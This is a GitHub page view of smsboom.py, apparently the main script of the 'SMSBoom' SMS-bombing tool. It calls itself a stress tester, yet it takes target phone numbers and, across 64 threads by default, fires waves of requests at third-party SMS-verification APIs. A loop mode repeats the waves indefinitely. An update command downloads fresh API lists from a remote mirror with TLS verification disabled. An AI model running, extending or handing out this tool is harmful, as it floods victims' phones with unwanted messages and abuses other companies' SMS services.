forked from OpenEthan/SMSBoom
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsmsboom.py
executable file
·136 lines (116 loc) · 4.38 KB
/
smsboom.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
# encoding=utf8
# Main program of the SMS stress-testing tool
import json
import pathlib
import sys
import time
from concurrent.futures import ThreadPoolExecutor
from typing import List, Union
import click
import httpx
from utils import default_header
from utils.log import logger
from utils.models import API
from utils.req import reqFunc
# Directory that contains this script; api.json and GETAPI.json are read from
# and written to this directory by the functions below.
path = pathlib.Path(__file__).parent
def load_json() -> List[API]:
    """Load the interface definitions stored in ``api.json`` next to this script.

    :return: list of ``API`` objects, one per entry of the JSON file
    :raises ValueError: if the file does not exist, or if its content cannot
        be decoded, parsed, or turned into ``API`` objects. In the second
        case the original error is chained as ``__cause__``.
    """
    json_path = pathlib.Path(path, 'api.json')
    if not json_path.exists():
        logger.error("Json file not exists!")
        raise ValueError(f"{json_path} does not exist")

    with open(json_path.resolve(), mode="r", encoding="utf8") as j:
        try:
            datas = json.load(j)
            APIs = [API(**data) for data in datas]
        except Exception as why:
            # Broad on purpose: decoding errors, JSON syntax errors and
            # failures while constructing API objects are all reported to
            # the caller as ValueError, which is what callers catch.
            logger.error(f"Json file syntax error:{why}")
            raise ValueError(f"failed to load {json_path}: {why}") from why

    logger.success(f"api.json 加载完成 接口数:{len(APIs)}")
    return APIs
def load_getapi() -> list:
    """Load the entries stored in ``GETAPI.json`` next to this script.

    :return: the parsed JSON content, returned as-is (no conversion is done)
    :raises ValueError: if the file does not exist, or if its content cannot
        be decoded or parsed. In the second case the original error is
        chained as ``__cause__``.
    """
    json_path = pathlib.Path(path, 'GETAPI.json')
    if not json_path.exists():
        logger.error("GETAPI.json file not exists!")
        raise ValueError(f"{json_path} does not exist")

    with open(json_path.resolve(), mode="r", encoding="utf8") as j:
        try:
            datas = json.load(j)
            # len() stays inside the try block so that content without a
            # length is still reported as ValueError, as before.
            count = len(datas)
        except Exception as why:
            logger.error(f"Json file syntax error:{why}")
            raise ValueError(f"failed to load {json_path}: {why}") from why

    logger.success(f"GETAPI加载完成,数目:{count}")
    return datas
# NOTE: click uses the function docstring as the command's help text, so the
# docstring below is program output and is intentionally left unchanged.
@click.command()
@click.option("--thread", "-t", help="线程数(默认64)", default=64)
@click.option("--phone", "-p", help="手机号,可传入多个再使用-p传递", prompt=True, required=True, multiple=True)
@click.option('--super', "-s", is_flag=True, help="循环模式")
@click.option('--interval', "-i", default=60, help="循环间隔时间(默认60s)", type=int)
def run(thread: int, phone: Union[str, tuple], interval: int, super: bool = False):
    """传入线程数和手机号启动轰炸,支持多手机号"""
    # CLI entry point: loads both interface lists and submits one `reqFunc`
    # task per entry to a thread pool, either once or repeatedly.
    #   thread   -- max_workers of the ThreadPoolExecutor
    #   phone    -- value(s) of -p/--phone, handed unchanged to reqFunc
    #   interval -- seconds to sleep between rounds in loop mode
    #   super    -- loop-mode flag; the name shadows the builtin `super`
    #               inside this function
    logger.info(f"循环模式:{super},手机号:{phone},线程数:{thread},循环间隔:{interval}")
    with ThreadPoolExecutor(max_workers=thread) as pool:
        try:
            # Both loaders raise ValueError when their file is missing or
            # cannot be parsed.
            _api = load_json()
            _api_get = load_getapi()
        except ValueError:
            logger.error("读取接口出错!正在重新下载接口数据!....")
            # NOTE(review): `update` is wrapped by @click.command() further
            # down, so this call goes through click's command entry point
            # rather than the plain function -- confirm it behaves as
            # intended when reached from inside `run`.
            update()
            # Exit with status 1 after the update attempt.
            sys.exit(1)
        # Round counter, only used for the log messages in loop mode.
        i = 0
        if super:
            # No exit condition: loop mode runs until the process is stopped.
            while True:
                i += 1
                logger.success(f"第{i}波轰炸开始!")
                for api in _api:
                    pool.submit(reqFunc, api, phone)
                for api_get in _api_get:
                    pool.submit(reqFunc, api_get, phone)
                # submit() only queues the tasks; the returned futures are
                # not awaited before sleeping.
                logger.success(f"第{i}波轰炸提交结束!休息{interval}s.....")
                time.sleep(interval)
        else:
            # Single round; leaving the `with` block waits for the pool to
            # finish the queued tasks.
            for api in _api:
                pool.submit(reqFunc, api, phone)
            for api_get in _api_get:
                pool.submit(reqFunc, api_get, phone)
@click.command()
def update():
    """从 github 获取最新接口"""
    # The docstring above doubles as click's help text, so it is kept as-is.
    #
    # Downloads GETAPI.json and api.json from the remote mirror and overwrites
    # the local copies next to this script. If any download fails, nothing is
    # written and an error is logged.
    #
    # NOTE(review): TLS verification is disabled (verify=False) and the HTTP
    # status of the responses is not checked before the files are overwritten.

    # Local file name -> remote URL, in the order they are fetched and written.
    remote_sources = {
        "GETAPI.json": "https://hk1.monika.love/AdminWhaleFall/SMSBoom/master/GETAPI.json",
        "api.json": "https://hk1.monika.love/AdminWhaleFall/SMSBoom/master/api.json",
    }
    logger.info("正在从GitHub拉取最新接口!")

    try:
        with httpx.Client(verify=False, timeout=10) as client:
            # Fetch everything first so a failed download leaves the local
            # files untouched.
            downloaded = {
                file_name: client.get(url, headers=default_header).content.decode(encoding="utf8")
                for file_name, url in remote_sources.items()
            }
    except Exception as why:
        logger.error(f"拉取更新失败:{why}请关闭所有代理软件多尝试几次!")
        return

    for file_name, text in downloaded.items():
        target = pathlib.Path(path, file_name).absolute()
        with open(target, mode="w", encoding="utf8") as out:
            out.write(text)
    logger.success("接口更新成功!")
# Root click command group. It has no behaviour of its own; the subcommands
# are attached below. No docstring is added here on purpose, because click
# would display it as help text.
@click.group()
def cli():
    pass


# Register the two subcommands on the group.
cli.add_command(run)
cli.add_command(update)

# Only start the CLI when the file is executed as a script.
if __name__ == "__main__":
    cli()